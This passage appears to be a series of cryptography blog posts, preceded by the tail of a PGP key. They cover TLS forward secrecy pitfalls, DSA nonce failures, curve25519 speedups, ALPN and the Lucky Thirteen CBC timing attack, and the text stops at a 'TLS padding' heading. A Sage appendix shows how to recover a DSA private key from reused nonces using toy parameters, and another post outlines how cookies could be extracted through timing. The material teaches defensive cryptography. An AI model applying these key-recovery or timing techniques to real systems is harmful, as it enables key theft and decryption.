nc5l8dT8dgCfXIGUuGRQFR8u/RCqV1WdP7VcqV2oo6usTgQJyTp1tv3bcyi1Hwif
eIiaSRYgUGKJBrNtnfjJ70o2WxBHNRSbn3EZEjd5oleAl5ngWZXTQA6UdPpi2jXP
lWi6mj6VHoTSIe1M95JowHkzHz7EFh93iUKMso1m1itToyI7XTXUUNSVIDBPx8AJ
1CVWu5KX4NfIIBv5/YKumeho5rzRst3dDk1FoEeekDA3I3hgdhrN9OW+12WXGj2R
C7I1s/VSP1GwEcOJ+cqaL6LtEaeV7xxdT/glmucH5NxwQyT6f2D5F/OCtP1v/xH9
/yDUIbBz3pzYjDvWnCnWHEq9evHNqzdDcfoTBrJ+q+F2O+5eT4Xc8W968HTKE/sF
+Unb/BTlDzJFXh9Z1c7Q0uX4ORobHn29huCnFTq5Ag0EUZpgOgEQAOE+hiuOPnkf
w2n4zl8iXpEdaHl5m8FpDhEyM34BqdPUuBBuNqHteTGQkjdRuSTXg51k4V9HcKbw
PQjguFfdSDGZJhr0Nk7QeMQTNmIIHfeIGi517IwgT5j5AulDVYOjNgQf5QEYxbFh
gxoVBTrUOODTxHUDRYwCKdAn6LEdg+B+mNR+KsY4+W3/fMOKE+3yTJP2DQxf0+Tn
IKNfNRzjTgpNo2I0bA/t3v8erotQDhdTDezPWwZbjP1/VbInBsSgj8m3xYypieet
SFKkNoMxDAzWVN8aSApp2hMpDymhpTh5/A7N9JnhqX4ZQnSyOInaTEAFyHSlBy4F
xJ7UyjWxwqXpDg5AeNcB0AkJnka6vdGqPgUTwI6RLJHd1Hmn0vyNeXY59R7+FH0Z
HVXau8KyUIQpvd4lLVw1zqwA+JsoS3Vbs6KxqzXhlGcnZGOGIgf1F4iq0nHiKbjy
65if3juSZ5nFzOWWWqDxjyr+amF1+rIvNRTYNBccg3WpeaMSTGMz+BMSqFQgjl7D
ozrQSQ4JKaoMI8worF0HF8R11198L4DFHY4lFDzlYAHY7nd4nQdy203eQDd/XEfZ
Gi52bdvni/vjRhx8QqqsvaWlmwv0EK6aTOA7Bs8RkzPqXicFUVFZA1hb2nnRIwM2
BMjHf770JaKcrmyhZ2daEH0K5ZWO4FEtABEBAAGJAh8EGAECAAkFAlGaYDoCGwwA
CgkQHQ2X8ivgvCnoCA/+N1ZCQOPjh8t5PcUo798T9ZVRMNN51DXcNK6CMsltFv3Q
UGv7HWLXHiMA1Ur/bGpLO8682z1FAzmJKZZZ9EI5sBR21opYZrXu1T9n/BDYVb17
2oQP1Ae4uePGwFlBh+LNXJZIdpSazUAB+AmvWMlgMzoorrqjIMZIVdGNR3e+Shx4
zPvJsTtogOcrcsrEb2XyThF5J8PMbtDLQ7X9tjWRcZxLypBdObRVGrxjqOK13V8P
y0lkUUZFatM9EDzklTSWN7dDT4Uhuk5WcRRErP4DY9ewEW7VF/QtgViuJV+/2x6G
r+vDwJe+KtV/tQlNz5wmUSHvcsD+7ssOTVq3PRDwORiMZO+EO46j1NfMgJr85Mga
fxhOgTZ6EWJLBmKrKqN0T1nL74VsXfl6Lrk5wiNJ8vfpMraGT+0I7oNWclv+Ay3+
icXpEAYGbBpm9pHkxjgpaHemIzATMmTDRtF3DtxI9+VlwD2btl+A5KGWI5OSpHeW
HAEP2/7lnmpGQVw5ez7xaQmwYPondMM9VgbfNA3yPU7D7UhLgulUNLR0UHWJokdX
JjtE5TYLSRZgnzy5iOiTGg/IUzn0tkBdfS0p0fxnP6OvMItmt/JLZSgsyZCCb2CP
61N17aag++CmfiELQkOgfacjo0bIrjdlrjx9vNYcVePif8Ds9oc6MzkLTlDP2S4=
=NKhg
-----END PGP PUBLIC KEY BLOCK-----

How to botch TLS forward secrecy

There's been some discussion about forward secret TLS recently, spurred, I think, by this piece from Declan McCullagh on CNET.

In case there are people out there wondering about turning it on, I thought it would be a good time to discuss some of the ways to mess it up!

In the case of multiplicative Diffie-Hellman (i.e. DHE), servers are free to choose their own, arbitrary DH groups. Historically some servers have had groups as small as 256 bits! Opera used to reconnect without DHE cipher suites in this case and Chrome now simply fails the connection with ERR_SSL_WEAK_SERVER_EPHEMERAL_DH_KEY. However, it's still the case that some servers use 512-bit DH groups, meaning that the connection can be broken open with relatively little effort.

So the first way to mess up forward secrecy is to use undersized DH groups. Ideally the DH group would match or exceed the RSA key size, but 1024-bit DHE is arguably better than straight 2048-bit RSA, so you can get away with that if you want to.

If you're using ECDHE then you don't need to worry about it being too small because the smallest EC group that clients support (P-256) is far, far stronger than 2048-bit RSA anyway.

So the next way to mess up forward secrecy is to get compromised via session resumption. TLS offers two session resumption mechanisms: session IDs (where the server and client each store their own secret state) and session tickets (where the client stores the server's state, encrypted by the server). If an attacker can obtain the session resumption information for a connection then they can decrypt the connection. (This needn't be completely true, but it is for TLS because of the way that TLS is designed.)

In the case of session IDs, the session information will either be kept in memory or kept on disk, depending on how the server is configured. (See the SSLSessionCache directive in Apache.) The forward secrecy of a connection is bounded by how long the session information is stored at the server. A small, in-memory cache likely has a high turnover rate, but a disk-cache could retain that information for a long time. Ideally one would have a medium sized, in-memory cache that turned over once a day or so.

In the case of session tickets, the server's encrypted state is transmitted to the client in the clear, so the server's session ticket key is what's protecting the connection. If you're running a single server then the session ticket key is probably generated randomly, at startup and kept in memory. So the forward secrecy of the connections is actually limited by the security of the server's memory until the server is restarted. It's possible for servers to run for many months without a restart so connections could be a lot less forward secure than you might think.

If you run several servers then they all need to share the same session ticket key otherwise they can't decrypt each other's session tickets. In Apache you would configure that with the SSLSessionTicketKeyFile directive. In this case your forward secrecy is limited by the security of that file on disk. Since your SSL private key is probably kept on the same disk, enabling forward secure cipher suites probably hasn't actually achieved anything other than changing the file that the attacker needs to steal!

So how do you run forward secrecy with several servers and support session tickets? You need to generate session ticket keys randomly, distribute them to the servers without ever touching persistent storage and rotate them frequently. However, I'm not aware of any open source servers that support anything like that.
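
As a rough illustration of the "generate randomly, keep in memory, rotate frequently" part, here is a minimal Python sketch. The class name TicketKeyRing, the one-hour lifetime and the two-key window are all assumptions made for the example, not the behaviour of any real server, and the hard part (distributing keys between servers without touching disk) is not covered at all.

```python
import os
import time

class TicketKeyRing:
    """Hypothetical in-memory session ticket keys; nothing is written to disk."""

    def __init__(self, lifetime_seconds=3600, keep=2, now=time.time):
        self.lifetime = lifetime_seconds
        self.keep = keep      # how many keys to retain (current plus older ones)
        self.now = now        # injectable clock, handy for testing
        self.keys = []        # (created_at, key_name, key), newest first
        self._rotate()

    def _rotate(self):
        # A 16-byte name identifies the key inside a ticket; the 32-byte
        # secret is what would actually protect the ticket contents.
        self.keys.insert(0, (self.now(), os.urandom(16), os.urandom(32)))
        # Forgetting old keys is the point: tickets made under them can no
        # longer be decrypted by anyone, including an attacker who turns up later.
        del self.keys[self.keep:]

    def current(self):
        """Return (key_name, key) for new tickets, rotating first if expired."""
        if self.now() - self.keys[0][0] >= self.lifetime:
            self._rotate()
        return self.keys[0][1], self.keys[0][2]

    def lookup(self, key_name):
        """Return the key for an incoming ticket, or None if it was rotated out."""
        for _, name, key in self.keys:
            if name == key_name:
                return key
        return None
```

With these (assumed) settings a ticket is decryptable for at most two lifetimes, which bounds how long a memory compromise can reach back.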

Sudden Death Entropy Failures

During the time that the RSA patent was in force, DSA was the signature algorithm of choice for any software that didn't want to deal with patent licenses. (Which is why lots of old PGP keys are still DSA.) It has slowly disappeared since the patent expired and it appears that 4096-bit RSA is now the algorithm of choice if you're on the run from the NSA [1]. (And if you're a journalist trying to get a reply: keyid BDA0DF3C.)

But DSA can also be used with elliptic curves in the form of ECDSA and, in that form, it's likely that we'll see it return in the future, at least to some extent. SSH and GPG both support ECDSA now and CAs are starting to offer ECDSA certificates for HTTPS.

Unfortunately, DSA has an important weakness that RSA doesn't: an entropy failure leaks your private key. If you used a machine affected by the Debian entropy bug then, in that time, messages that you encrypted with RSA can be broken. But if you signed anything with a DSA key, then your private key is compromised.

The randomness in DSA is absolutely critical. Given enough signatures, leaking just a handful of bits per signature is sufficient to break it. In the limit, you can make the mistake that Sony did and not understand that the random number needs to be generated for each message and, seemingly, just pick one and code it in. (See XKCD.)

But it doesn't need to be this way! All that is required of the nonce is that it be unique for each distinct message and secret, and we can achieve that by hashing the message and private key together. That's what Ed25519 does and I've added the option to OpenSSL to do the same. Unlike RSA and Ed25519 signatures, DSA signatures are probabilistic - signing the same message twice with the same key will result in different signatures. Since someone may be depending on that, OpenSSL also hashes in some randomness to maintain that feature.

(p.s. if you're an actual cryptographer, please take a look at the core of the code and let me know if I'm an idiot.)

Since the DSA specification says that the nonce must be randomly generated, and compliance with the spec is important for many users, this isn't enabled by default. For ECDSA keys, one needs to call EC_KEY_set_nonce_from_hash, for example. But hopefully we can measurably improve things with little effort by doing this.
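
To make the idea of deriving the nonce from the message and private key concrete, here is a small Python sketch. It is not the OpenSSL code, nor exactly what Ed25519 does: it swaps in HMAC-SHA-512 keyed with the private key as one plausible way to hash the two together, and the function name deterministic_nonce is made up for the example.

```python
import hashlib
import hmac

def deterministic_nonce(private_key: int, message: bytes, n: int) -> int:
    """Derive a per-message nonce k in [1, n-1] from the private key and message.

    n is the order of the group that the signatures are computed in.
    """
    key_bytes = private_key.to_bytes((n.bit_length() + 7) // 8, "big")
    # Keyed hash of the message: unpredictable without the private key, and
    # the same (key, message) pair always produces the same k.
    digest = hmac.new(key_bytes, message, hashlib.sha512).digest()
    # Reduce into [1, n-1]. With a 512-bit digest the bias from the modular
    # reduction is small for the roughly 256-bit orders assumed here.
    return int.from_bytes(digest, "big") % (n - 1) + 1
```

Two different messages get unrelated nonces, while signing the same message twice reuses the same nonce, which is harmless because it also reproduces the same signature. Mixing fresh randomness into the hash input would restore the probabilistic behaviour described above.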

Appendix

Here's an example of breaking DSA with a known nonce: essentially the Sony PlayStation hack. I've used the variable names from the Wikipedia page for those that want to follow along, although I'm not using a subgroup to keep things simple.

(The example is done with Sage.)

Let's pick some (public) DSA parameters:

p = 2903
F = GF(p)
g = F(2)
n = g.multiplicative_order()

Next, generate a key pair. x is the private key and y is the public key:

x = int(F.random_element()) % n
y = g^x
(x, y)
(1282, 966)

Generate our nonce, which will be fixed for two different messages in this example:

k = int(F.random_element()) % n
kInv = inverse_mod(k, n)

The first message that we sign will be 42 and the pair (r, s) is the signature. (Normally the message would be a hash of a much larger message.) The signature is very simple: r is g^k and s is (m + xr)/k:

m = 42
r = int(g^k) % n
s = ((m + x*r) * kInv) % n
(r, s)
(1401, 1168)

As an aside, we can verify the signature that we just made:

w = inverse_mod(s, n)
u1 = m*w
u2 = r*w
v = g^u1*y^u2
v == r
True

Next, we also sign the message 24 (which I'll call mm) and we gather the two signatures. We have s and ss, both with the same r. Since s = (m + xr)/k, we can subtract the two to get (m + xr - mm - xr)/k, which is just (m - mm)/k. Thus k = (m - mm)/(s - ss). Given k, we can rearrange the original equation for s: s = (m + xr)/k ⇒ sk = m + xr ⇒ sk - m = xr ⇒ (sk - m)/r = x. And thus we have the private key:

(r, s) = (1401, 1168)
(r, ss) = (1401, 1212)
kk = ((42 - 24)*inverse_mod(s-ss,n)) % n
xx = ((s*kk - 42) * inverse_mod(r, n))%n
print(xx == x)
xx
True
1282

Faster curve25519 with precomputation

(Update: based on questions, I've clearly failed to point out what this is, or rather what it isn't. Fixed base multiplication only applies when performing many operations on the same public key, i.e. key generation or perhaps some other cases. If you're working with random public keys then precomputation cannot help, I'm afraid.)

Diffie-Hellman is one of the most important public-key cryptographic primitives, even if it doesn't have the name recognition of, say, RSA. When anything is providing forward secrecy then it's very likely using Diffie-Hellman. In fact, the reason that web servers do RSA operations at all is mostly a legacy hangover. If we could design things afresh then there would be a lot more Diffie-Hellman and everything would be a lot faster!

Of the concrete implementations of Diffie-Hellman, curve25519 is the fastest, common one. There are some faster primitives in eBACS, but the ones that are significantly faster are also significantly weaker. My machine (E5-2690, with Hyperthreading and TurboBoost disabled) can do a curve25519, arbitrary base point, scalar multiplication (a.k.a. Diffie-Hellman key agreement) in just 67.5µs.

But nobody will complain if it gets faster, right?

The core of Diffie-Hellman is calculating x^y in some group. The simplest way to calculate x^y is the classic square-and-multiply algorithm:

(Note: I'll be using multiplicative notation throughout because I think it's more familiar to most people, although additive is more common for the specific groups that we're dealing with here.)

Start with the number 1, which is x^0 (because anything to the power of zero is 1). If we multiply by x then we get x^1. So, by multiplying by x we've added one to the exponent. If we square our new number then we get x^2 - squaring doubles the exponent.

Now consider the exponent as a binary number: x^1 is x^1b and squaring it gets us x^10b. Squaring is a left shift of the exponent! Now, given any y in binary form, we can calculate x^y with a series of additions by 1 and left shifts - i.e. multiplies by x and squarings.

If we have y = 1011b then we start with x^0 = 1, as always, and read y left-to-right: the first bit is a one so we multiply by x to get x^1b. Left shift: x^10b. We already have the 0 in there so left shift again: x^100b. Multiply by x: x^101b. Left shift: x^1010b. Multiply by x: x^1011b. Done.

With square-and-multiply, the bits of the desired exponent are clocked in, bit by bit, as the squarings do the left shifting.
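
The walk-through above can be sketched in a few lines of Python. This uses integers modulo a prime p as a stand-in group (an assumption for illustration; curve25519 works on curve points) and makes no attempt to be constant-time.

```python
def square_and_multiply(x: int, y: int, p: int) -> int:
    """Compute x^y mod p by clocking in the bits of y, most significant first."""
    result = 1  # x^0
    for bit in bin(y)[2:]:
        # Squaring left-shifts the exponent accumulated so far. Squaring the
        # initial 1 is a no-op, so this matches multiplying first, then shifting.
        result = (result * result) % p
        if bit == "1":
            # Multiplying by x adds one to the exponent.
            result = (result * x) % p
    return result
```

For y = 1011b this performs the same multiply, shift, shift, multiply, shift, multiply sequence as the example in the text.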

This is essentially what curve25519 does. It has lots of tricks to make it fast but, if you're calculating lots of powers of the same x then there are a number of tricks to make things faster. I'm only going to cover a couple of basic ones here.

Firstly, one can precalculate x^1, x^2, x^3, … x^15. Now, by multiplying by one of those values we can add any value from 0 to 15 to the exponent in a single multiplication. We're essentially clocking in four bits at a time. After one multiplication we have to do four squarings to left shift 4 bits to make space for the next 4 bits to be clocked in. This reduces the number of multiplications by a factor of 4.
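
Here is a sketch of that 4-bit window in Python, again using integers modulo a prime p as a stand-in group (an assumption for illustration only). The table also holds x^0 so that a zero chunk needs no special case.

```python
def windowed_pow(x: int, y: int, p: int) -> int:
    """Compute x^y mod p, clocking in four bits of y per multiplication."""
    # table[d] = x^d for d = 0..15
    table = [1]
    for _ in range(15):
        table.append((table[-1] * x) % p)

    # Split y into 4-bit chunks, least significant first.
    chunks = []
    while y:
        chunks.append(y & 0xF)
        y >>= 4

    result = 1
    for chunk in reversed(chunks):
        for _ in range(4):
            # Four squarings: shift the exponent left by 4 bits.
            result = (result * result) % p
        # One multiplication adds the whole chunk to the exponent.
        result = (result * table[chunk]) % p
    return result
```

The number of squarings is unchanged, but there is now one multiplication per four bits of exponent rather than up to one per bit.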

Next, imagine that our exponents were always 8-bits long. We could precalculate x^00000000b, x^00000001b, x^00010000b and x^00010001b. By multiplying by one of those values we can clock in bits in two positions at once. Previously we always clocked in bits at the right hand side of the exponent, but those precomputed powers mean that we can clock in bits at bit 4 (counting from zero) too. Thus we deal with the exponent as two, 4-bit values and the squarings are shared between them. We only have to square and multiply four times to cover the whole 8-bit value.

In cryptography, the powers are usually larger than 8-bits, of course, but you can clock in at 4 or 8 positions if you wish. It's a classic time/memory trade-off because more positions mean exponentially more precomputed values.
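
The 8-bit, two-position example can be written out as follows. As before, this is only a sketch in Python with integers modulo a prime p standing in for the group, and the function name is made up.

```python
def comb_pow_8bit(x: int, y: int, p: int) -> int:
    """Compute x^y mod p for an 8-bit y with four squarings and four multiplications."""
    assert 0 <= y < 256
    x16 = pow(x, 16, p)
    # Indexed by (bit for the high half, bit for the low half):
    # x^00000000b, x^00000001b, x^00010000b, x^00010001b
    table = [1, x % p, x16, (x16 * x) % p]

    high, low = y >> 4, y & 0xF
    result = 1
    for i in range(3, -1, -1):
        # One squaring shifts both 4-bit halves left at the same time.
        result = (result * result) % p
        index = (((high >> i) & 1) << 1) | ((low >> i) & 1)
        # One multiplication clocks in a bit at position 0 and a bit at position 4.
        result = (result * table[index]) % p
    return result
```

Clocking in at k positions needs 2^k table entries, which is the exponential memory cost mentioned above.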

(There are more and better tricks than the two that I've just outlined; some are detailed on this Wikipedia page.)

Precomputation in curve25519

The reason that such precomputation hasn't been applied to curve25519 before is (I think), because of a detail that I glossed over before: curve25519 is actually a Montgomery curve that uses differential addition. Rather than being able to multiply arbitrary values, a and b, you instead need to also know the value of a/b first. That throws a spanner in the works of the typical optimisations.

If you review elliptic curves, you'll recall that operations on the elliptic curve group consist of operations on the underlying field. In curve25519's case it's the field GF(2^255-19), which is where it gets its name from. We can roughly measure the amount of time that something will take by the number of field operations required. (Note to practitioners: I'm taking a field squaring as 0.8 multiplications and one multiplication is an ‘operation’.)

A curve25519 exponent is 255 bits long. Each squaring takes 3.6 operations and each multiplication by x takes 4.6 operations. 255*(3.6+4.6) is 2091 operations. We also need a final conversion (a field inversion) that costs 215.2 operations for a total of 2306.2. That's the number to beat.

In order to work in a group which has nice, arbitrary multiplication operations we map curve25519 to an isomorphic, Twisted Edwards curve. In fact, exactly the same curve as used by Ed25519, which is a fast signature primitive. This also means that we get to use Ed25519's highly optimised code. In order to be able to use as much code as possible, we use exactly the same precomputation scheme as described in section 4 of the paper.

This scheme is based on 256-bit exponents, which it splits into 64, 4-bit chunks. But it uses lots of precomputed values! For every other 4-bit chunk, it precomputes all 16 possible values. So the first subtable contains the 16 values x^0000b, x^0001b, x^0010b, …, x^1111b. The next subtable contains the 16 values for the next but one 4-bit chunk. So that's x^(0000 0000 0000b), x^(0001 0000 0000b), x^(0010 0000 0000b), …, x^(1111 0000 0000b). It has 32 of those subtables!

It picks one value from each subtable and, with 32 multiplications, takes care of half the bits of the exponent. Then it squares four times to left-shift those values into place and does another 32 multiplications from the same subtables to take care of the other half of the bits. That's a total of 64 multiplications and 4 squarings.
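
The shape of that scheme can be sketched in Python. This is not the Ed25519 code: it uses integers modulo a prime p instead of Twisted Edwards points, stores all 16 values per subtable, and is not constant-time. The function names are invented for the example.

```python
def build_subtables(x: int, p: int) -> list:
    """Build 32 subtables; subtable j holds x^(d * 16^(2j)) for d = 0..15."""
    subtables = []
    base = x % p
    for _ in range(32):
        row = [1]
        for _ in range(15):
            row.append((row[-1] * base) % p)
        subtables.append(row)
        # Move on by two 4-bit chunks: raise the base to the power 16^2 = 256.
        base = pow(base, 256, p)
    return subtables

def fixed_base_pow(subtables: list, y: int, p: int) -> int:
    """Compute x^y mod p for a 256-bit y using 64 multiplications and 4 squarings."""
    chunks = [(y >> (4 * i)) & 0xF for i in range(64)]
    result = 1
    # First pass: the odd-numbered chunks, placed 4 bits too low for now.
    for j in range(32):
        result = (result * subtables[j][chunks[2 * j + 1]]) % p
    # Four squarings shift all of them left by 4 bits, into their real positions.
    for _ in range(4):
        result = (result * result) % p
    # Second pass: the even-numbered chunks, from the same subtables.
    for j in range(32):
        result = (result * subtables[j][chunks[2 * j]]) % p
    return result
```

The tables depend only on x, so they are built once and reused for every exponent, which is why this only helps for a fixed base.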

(It actually uses a trick which means that it only needs to store 8 of the 16 values in each subtable, but that's outside the scope of this post.)

We're in a different group now and so the costs are different: multiplications cost 6 operations and squarings cost 7. (The field is the same so an ‘operation’ takes the same time.) 64*6 + 4*7 = 412, so that's looking good. We need another field inversion to finish up, same as curve25519, for a total cost of 627.2. Those rough costs suggest that the Twisted Edwards precomputation should be 3.6x faster, which is promising!
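
For anyone who wants to play with the estimate, the arithmetic from the last few paragraphs fits in a few lines of Python. The per-operation costs are the rough figures quoted in the text, not measurements, and the variable names are mine.

```python
FIELD_INVERSION = 215.2  # final conversion, needed in both cases

# Montgomery ladder: 255 bits, one squaring-like step and one multiply per bit.
montgomery_cost = 255 * (3.6 + 4.6) + FIELD_INVERSION

# Twisted Edwards with precomputation: 64 multiplications and 4 squarings.
edwards_cost = 64 * 6 + 4 * 7 + FIELD_INVERSION

speedup = montgomery_cost / edwards_cost

print(f"Montgomery ladder: {montgomery_cost:.1f} operations")
print(f"Precomputed Edwards: {edwards_cost:.1f} operations")
print(f"Estimated speedup: {speedup:.2f}x")
```

Changing the number of table positions or the chunk size only changes the 64 and the 4, so it is easy to see how other time/memory trade-offs would compare under the same cost model.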

(Updated: I originally suggested that two field inversions were required because I'm an idiot. Thanks to @CodesInChaos for asking why.)

The actual timings

Based on the amd64-64-24k implementation of Ed25519 in SUPERCOP, it's fairly easy to implement. On the same machine as the curve25519 speed was measured, above, the precomputed curve25519 runs in 21.9µs, a 3.1x speedup with 24KB of tables. So it's not as fast as the rough calculations suggested, but that's because we're now processing 24KB of memory. That cache pressure isn't free of course, although benchmarks make it look mostly free because they run in a tight loop and so the tables will always be in L1 cache. Still, it means that CPU can sustain 350,000 public key operations per second.

(Code still too messy to release. I hope to tidy it up next week.)

NPN and ALPN

Since its inception, SPDY has depended on a TLS extension called NPN. NPN allows a TLS connection to negotiate which application-level protocol will be running across it.

NPN allows SPDY to be enabled efficiently. If we had run SPDY on a different port, then we would have had to be constantly creating probing connections to see whether a site supported SPDY as well as HTTPS. Even if we knew that a site supported SPDY, network devices between any given client and that site might block connections to the different TCP port. If we had tried an HTTP Upgrade header, that would have slowed everything down and caused compatibility issues with servers and proxies that didn't process the header correctly.

NPN also allows us to update SPDY without spending round trips on a version negotiation. Overall, NPN has worked very well for SPDY.

NPN attempted to be a little bit future proof by sending the selected application protocol name under encryption, so that network devices couldn't discriminate. The benefit was somewhat limited because the server's list of supported protocols was still sent in the clear but we believe that anything that can be encrypted, should be encrypted.

There is an alternative to NPN: ALPN is essentially the same design except that the negotiation is done in the clear (like other TLS extensions).
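
From an application's point of view, this kind of negotiation usually comes down to offering a list of protocol names and reading back the one that was selected. As a sketch, here is what that looks like with the ALPN support in Python's standard ssl module. The helper names are invented for the example, and the protocol identifiers passed in by a caller (such as "h2" or "http/1.1") are illustrative choices rather than anything specified in this post.

```python
import ssl

def make_alpn_client_context(protocols):
    """Build a TLS client context that offers `protocols` via ALPN."""
    context = ssl.create_default_context()
    # The list is sent in the ClientHello, most preferred protocol first.
    context.set_alpn_protocols(list(protocols))
    return context

def negotiated_protocol(tls_socket):
    """After the handshake, return the protocol the server picked.

    Returns None if the server did not select one, in which case a client
    would simply carry on with plain HTTPS.
    """
    return tls_socket.selected_alpn_protocol()
```

A client would wrap its TCP socket with context.wrap_socket(sock, server_hostname=...) and then branch on the result of negotiated_protocol.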

Last Friday, at IETF 86 in Orlando, the TLS working group considered both designs and came to a rough consensus on ALPN. ALPN is currently on track to be published as an RFC at some point and we will be switching SPDY over to it and deprecating NPN.

Once IANA has assigned a TLS extension number for ALPN, Google servers will start supporting both NPN and ALPN, with a preference for ALPN. Chrome and, I expect, other browsers will start sending both NPN and ALPN extensions. During this time, SPDY servers will be able to switch from NPN to ALPN without dropping SPDY support for current clients.

At some point after the end of 2014, I plan on removing NPN support from Chrome and Google servers. Any old servers and clients will continue to function just fine: they'll just use HTTPS.

Lucky Thirteen attack on TLS CBC

In an upcoming paper (made public this morning), Nadhem AlFardan and Kenny Paterson describe another method of performing Vaudenay's attack on CBC as used in TLS. Firstly I'd like to thank the researchers for notifying the various vendors ahead of time so that patches could be prepared: the disclosure process has gone very smoothly in this case. I couldn't have asked for anything more - they did everything right.

Vaudenay's attack requires an attacker to be able to detect when a CBC padding check has succeeded, even if the authentication check then fails. Authentication should always be applied after encryption to avoid this, but TLS famously did it the wrong way round with CBC mode.

Knowing whether a padding check succeeded reveals information about the decrypted plaintext. By tweaking the ciphertext over many trials, it's possible to progressively decrypt an unknown ciphertext. For details, see their paper, which does a better job of explaining it than I would.

Vaudenay first used the fact that these two situations (padding check failure and authenticator failure) resulted in different TLS alert values, although that didn't result in a practical attack because TLS errors are encrypted. Once that was corrected (by specifying that the same alert value should be sent in each case) the next year's paper used a timing-side channel: if the authentication check wasn't performed when the padding check failed then, by timing the server's response, an attacker could tell whether the server aborted processing early.

To try and remove that side-channel, TLS stacks perform the authentication check whether or not the padding check succeeds. However, here's what I commented in the Go TLS code:

Note that we still have a timing side-channel in the MAC check, below. An attacker can align the record so that a correct padding will cause one less hash block to be calculated. Then they can iteratively decrypt a record by breaking each byte. However, our behavior matches OpenSSL, so we leak only as much as they do.

That pretty much sums up the new attack: the side-channel defenses that were hoped to be sufficient were found not to be (again). So the answer, this time I believe, is to make the processing rigorously constant-time. (Details below.)

As a practical matter, since a padding or authenticator check failure is fatal to a TLS connection, performing this attack requires a client to send the same plaintext secret on thousands of different connections to the same server. This isn't a trivial obstacle but it's possible to meet this requirement for cookies with a browser and a bit of JavaScript injected into any origin in the same session.

For DTLS the attack is much easier because a rejected record doesn't cause the connection to be destroyed and the same authors developed a method for amplifying timing attacks against DTLS in a previous paper.

Unfortunately, unlike BEAST, this isn't something that we can unilaterally fix on the client side (except by disabling CBC mode, which might have significant compatibility issues). On the server side, making RC4 the most preferable cipher solves the problem although I do recommend that server admins apply patches as they become available even so. Having RC4 as an option has been a useful fallback for CBC problems but, if patches aren't applied, then RC4 becomes a monoculture in the future.

Implementing constant time CBC decoding

Fixing this problem in a backwards compatible manner is, sadly, really rather complex. We need to ensure that all CBC records are authenticated in constant time. Initially we define constant-time to mean that, for all values of the secret input, the trace of instructions executed and memory locations accessed is identical (on an in-order machine). Here the secret input is the decrypted CBC record before the padding and MAC have been checked.

Meeting this definition is tough and there's a great temptation to remove some of the more glaring timing leaks and hope that the remainder is small enough not to be practical. But the DTLS trick mentioned above can be used to amplify any timing side-channels. Additionally, situations change and implementations that are currently only exposed over a network may, in the future, be exposed to attackers running on the same machine. At that point, cache-line probing and other powerful timing probes can be brought to bear against any side-channels that remain.

For the purposes of this post, we consider the decrypted, CBC record to contain the following parts:

  1. n bytes of plaintext. (Which may be compressed but, within our scope, it's plaintext.)
  2. mac_size bytes of MAC. (Up to 48 bytes in TLS with SHA-384. We conservatively assume that the minimum number of MAC bytes is zero since this is clearly a valid lower-bound and accounts for truncated MAC extensions.)
  3. padding_length bytes of padding.
  4. One byte of padding length. (Some consider this to be part of the padding itself, but I'll try to be consistent that this length byte is separate.)

With this secret data in hand, we need to perform three steps in constant time:

  1. Verify that the padding bytes are correct: the padding cannot be longer than the record and, with SSLv3, must be minimal. In TLS, the padding bytes must all have the same value as the length byte.
  2. Calculate the MAC of the header and plaintext (where the header is what I'm calling the additional data that is also covered by the MAC: the sequence number etc).
  3. Extract the MAC from the record (with constant memory accesses!) and compare it against the calculated MAC.

Utilities

We will make extensive use of bitwise operations and mask variables: variables where the bits are either all one or all zero. In order to create mask values it's very useful to have a method of replicating the most-significant-bit to all the bits in a value. We'll assume that an arithmetic right shift will shift in the MSB and perform this operation for us:

#define DUPLICATE_MSB_TO_ALL(x) ( (unsigned)( (int)(x) >> (sizeof(int)*8-1) ) )
#define DUPLICATE_MSB_TO_ALL_8(x) ( (uint8_t)( (int8_t)(x) >> 7) )

However, note that the C standard does not guarantee this behaviour, although all CPUs that I've encountered do so. If you're worried then you can implement this as a series of logical shifts and ORs.
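
As a minimal sketch of that fallback, the helpers below replicate the top bit using only logical shifts on unsigned values and ORs, which C defines fully. The names msb_to_mask_32 and msb_to_mask_8 are made up for this example.

```c
#include <stdint.h>

/* Hypothetical helper: copy the most-significant bit of a 32-bit value into
 * every bit, using only logical (unsigned) shifts and ORs. */
static uint32_t msb_to_mask_32(uint32_t x) {
        x >>= 31;     /* x is now 0 or 1 */
        x |= x << 1;  /* bottom 2 bits */
        x |= x << 2;  /* bottom 4 bits */
        x |= x << 4;  /* bottom 8 bits */
        x |= x << 8;  /* bottom 16 bits */
        x |= x << 16; /* all 32 bits */
        return x;
}

/* The same idea for a single byte. The casts undo integer promotion. */
static uint8_t msb_to_mask_8(uint8_t x) {
        x >>= 7;
        x |= (uint8_t)(x << 1);
        x |= (uint8_t)(x << 2);
        x |= (uint8_t)(x << 4);
        return x;
}
```

Negating the shifted bit, as in 0u - (x >> 31), gives the same result in one step and is also well-defined for unsigned types.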

We'll define some more utility functions as we need them.

SSLv3 padding

SSLv3 padding checks are reasonably simple: we need only to test that the padding isn't longer than the record and that it's less than a whole cipher block. We assume that the record is at least a byte long. (Note that the length of the whole record is public information and so we can fast reject invalid records if we're using that length alone.) We can use the fact that, if a and b are bounded such that the MSB cannot be set, then the MSB of a - b is one iff b>a.

padding_length = data[length-1];
unsigned t = (length-1)-padding_length;
unsigned good = DUPLICATE_MSB_TO_ALL(~t);
t = block_size - (padding_length+1);
good &= DUPLICATE_MSB_TO_ALL(~t);

The resulting value of good is a mask value which is all ones iff the padding is valid.
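
To make the snippet above easier to try out, here is a sketch that wraps it in a function. The name sslv3_padding_good and the msb_mask helper are assumptions of this example; the asserts only look at public values.

```c
#include <assert.h>
#include <stdint.h>

/* All ones if the top bit of x is set, otherwise zero. */
static uint32_t msb_mask(uint32_t x) { return 0u - (x >> 31); }

/* Hypothetical wrapper: returns all ones iff the SSLv3 padding of the
 * decrypted record is valid, otherwise zero. length and block_size are
 * public; the contents of data are secret. */
static uint32_t sslv3_padding_good(const uint8_t *data, uint32_t length,
                                   uint32_t block_size) {
        /* Public preconditions, so rejecting here leaks nothing secret. */
        assert(length >= 1 && length < (1u << 31) && block_size <= 256);

        uint32_t padding_length = data[length - 1];
        /* MSB of t is set iff the padding is longer than the record. */
        uint32_t t = (length - 1) - padding_length;
        uint32_t good = msb_mask(~t);
        /* MSB of t is set iff padding plus length byte exceed a block. */
        t = block_size - (padding_length + 1);
        good &= msb_mask(~t);
        return good;
}
```

For a 32-byte record with a 16-byte block size, a final byte of 3 is accepted while a final byte of 16 is rejected, because 17 bytes of padding and length would be more than a whole block.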

TLS padding

